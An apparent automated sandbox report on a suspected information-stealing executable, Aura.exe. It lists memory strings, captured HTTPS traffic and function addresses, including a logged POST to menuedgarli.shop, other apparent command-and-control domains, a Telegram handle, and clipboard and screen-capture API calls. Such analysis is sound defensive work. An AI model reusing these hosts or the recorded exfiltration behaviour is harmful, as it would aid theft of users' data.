HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: menuedgarli.shop

Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Aura.exe, 00000004.00000002.2440401079.00000000012C3000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052362967.00000000012C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAn
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Aura.exe, 00000004.00000003.1340998626.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menuedgarli.shop/
Source: Aura.exe, 00000004.00000003.1282349186.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1283569818.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1340998626.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1340998626.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052300307.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1344874504.0000000001239000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440502080.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menuedgarli.shop/AUIqn
Source: Aura.exe, 00000004.00000003.1282396896.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menuedgarli.shop/au
Source: Aura.exe, 00000004.00000002.2439712146.000000000122C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menuedgarli.shopA
Source: Aura.exe, 00000004.00000003.2052300307.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440502080.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/
Source: Aura.exe, 00000004.00000002.2440257595.0000000001279000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440401079.00000000012C3000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052362967.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052207735.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052300307.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052418034.0000000001277000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440502080.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzS
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210253320.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Aura.exe, 00000004.00000002.2438513523.0000000000B6B000.00000004.00000010.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210154351.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2439712146.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asdawfq
Source: Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210154351.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=1d8e991a19232cb569_101849607591
Source: Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: C:\Users\user\Desktop\Aura.exe

Code function: 4_2_0043FF70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

4_2_0043FF70

Source: C:\Users\user\Desktop\Aura.exe

Code function: 4_2_0043FF70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

4_2_0043FF70

Source: C:\Users\user\Desktop\Aura.exe

Code function: 4_2_004406C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

4_2_004406C2

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C26460	0_2_00C26460
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE553B	0_2_00BE553B
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C24CB0	0_2_00C24CB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C01F50	0_2_00C01F50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C000E0	0_2_00C000E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C390F0	0_2_00C390F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3E0F0	0_2_00C3E0F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4B0F0	0_2_00C4B0F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFA0F0	0_2_00BFA0F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C26090	0_2_00C26090
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF50E0	0_2_00BF50E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEE030	0_2_00BEE030
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3C050	0_2_00C3C050
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1D070	0_2_00C1D070
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3D070	0_2_00C3D070
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE1000	0_2_00BE1000
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C36010	0_2_00C36010
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0E020	0_2_00C0E020
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4A030	0_2_00C4A030
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C441D0	0_2_00C441D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF01A0	0_2_00BF01A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFF190	0_2_00BFF190
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE41D0	0_2_00BE41D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C17170	0_2_00C17170
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C10110	0_2_00C10110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C34110	0_2_00C34110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF9150	0_2_00BF9150
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C18130	0_2_00C18130
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C522CA	0_2_00C522CA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF82B0	0_2_00BF82B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C05290	0_2_00C05290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE72E0	0_2_00BE72E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C412B0	0_2_00C412B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C20240	0_2_00C20240
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C03200	0_2_00C03200
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C42210	0_2_00C42210
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BED250	0_2_00BED250
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C58230	0_2_00C58230
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C293D0	0_2_00C293D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFE3A0	0_2_00BFE3A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C493E0	0_2_00C493E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0A3F0	0_2_00C0A3F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C153A0	0_2_00C153A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3D3B0	0_2_00C3D3B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C2A350	0_2_00C2A350
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C30350	0_2_00C30350
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3C350	0_2_00C3C350
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C09360	0_2_00C09360
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE8310	0_2_00BE8310
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFB310	0_2_00BFB310
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEA300	0_2_00BEA300
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C07320	0_2_00C07320
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C21320	0_2_00C21320
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0D330	0_2_00C0D330
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C43330	0_2_00C43330
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C384C0	0_2_00C384C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4A4C0	0_2_00C4A4C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0E490	0_2_00C0E490
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF0430	0_2_00BF0430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF4430	0_2_00BF4430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C05450	0_2_00C05450
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFD410	0_2_00BFD410
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C16410	0_2_00C16410
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C48420	0_2_00C48420
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF2450	0_2_00BF2450
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C33430	0_2_00C33430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C055C0	0_2_00C055C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1F5D0	0_2_00C1F5D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C495D0	0_2_00C495D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0B5F0	0_2_00C0B5F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C65592	0_2_00C65592
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1C5A0	0_2_00C1C5A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF6530	0_2_00BF6530
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1B560	0_2_00C1B560
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF3510	0_2_00BF3510
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C39576	0_2_00C39576
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C03530	0_2_00C03530
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3F530	0_2_00C3F530
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0C6D0	0_2_00C0C6D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1D6E0	0_2_00C1D6E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C186E0	0_2_00C186E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEE690	0_2_00BEE690
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C066F0	0_2_00C066F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEB6F0	0_2_00BEB6F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C35690	0_2_00C35690
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF76C0	0_2_00BF76C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C44640	0_2_00C44640
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C29650	0_2_00C29650
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF0620	0_2_00BF0620
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C21660	0_2_00C21660
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3A660	0_2_00C3A660
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEC610	0_2_00BEC610
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C37630	0_2_00C37630
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C41630	0_2_00C41630
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C307F0	0_2_00C307F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BED7F0	0_2_00BED7F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE9718	0_2_00BE9718
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEA700	0_2_00BEA700
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C35700	0_2_00C35700
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C63718	0_2_00C63718
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF9740	0_2_00BF9740
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C028C0	0_2_00C028C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C098A0	0_2_00C098A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C278A0	0_2_00C278A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFD810	0_2_00BFD810
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1C870	0_2_00C1C870
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C42800	0_2_00C42800
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1A810	0_2_00C1A810
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFF860	0_2_00BFF860
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE5856	0_2_00BE5856
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF3840	0_2_00BF3840
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1E9C0	0_2_00C1E9C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF89A0	0_2_00BF89A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE8990	0_2_00BE8990
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3D980	0_2_00C3D980
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEC906	0_2_00BEC906
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFE900	0_2_00BFE900
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C18900	0_2_00C18900
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4D90A	0_2_00C4D90A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEB960	0_2_00BEB960
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C36920	0_2_00C36920
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF6940	0_2_00BF6940
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF7AA0	0_2_00BF7AA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE9AF6	0_2_00BE9AF6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C03A90	0_2_00C03A90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C18AA0	0_2_00C18AA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C47AB0	0_2_00C47AB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3BA40	0_2_00C3BA40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C13A50	0_2_00C13A50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C28A70	0_2_00C28A70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C31A00	0_2_00C31A00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C43A20	0_2_00C43A20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0CA30	0_2_00C0CA30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0DA30	0_2_00C0DA30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF1BA0	0_2_00BF1BA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF0B90	0_2_00BF0B90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0ABF0	0_2_00C0ABF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1ABF0	0_2_00C1ABF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BFDB80	0_2_00BFDB80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C37BB0	0_2_00C37BB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C2EB40	0_2_00C2EB40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BECB0F	0_2_00BECB0F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE7B00	0_2_00BE7B00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF7B50	0_2_00BF7B50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF4C10	0_2_00BF4C10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C13C70	0_2_00C13C70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C02C00	0_2_00C02C00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C41C00	0_2_00C41C00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C17DD0	0_2_00C17DD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1DDD9	0_2_00C1DDD9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C27DF0	0_2_00C27DF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C02D80	0_2_00C02D80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1DD80	0_2_00C1DD80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE5DF6	0_2_00BE5DF6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF0DE0	0_2_00BF0DE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE8DD0	0_2_00BE8DD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BE9D30	0_2_00BE9D30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C43D60	0_2_00C43D60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C09D00	0_2_00C09D00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3FD00	0_2_00C3FD00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1FD20	0_2_00C1FD20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C1AEC0	0_2_00C1AEC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C2AEE0	0_2_00C2AEE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C22E80	0_2_00C22E80
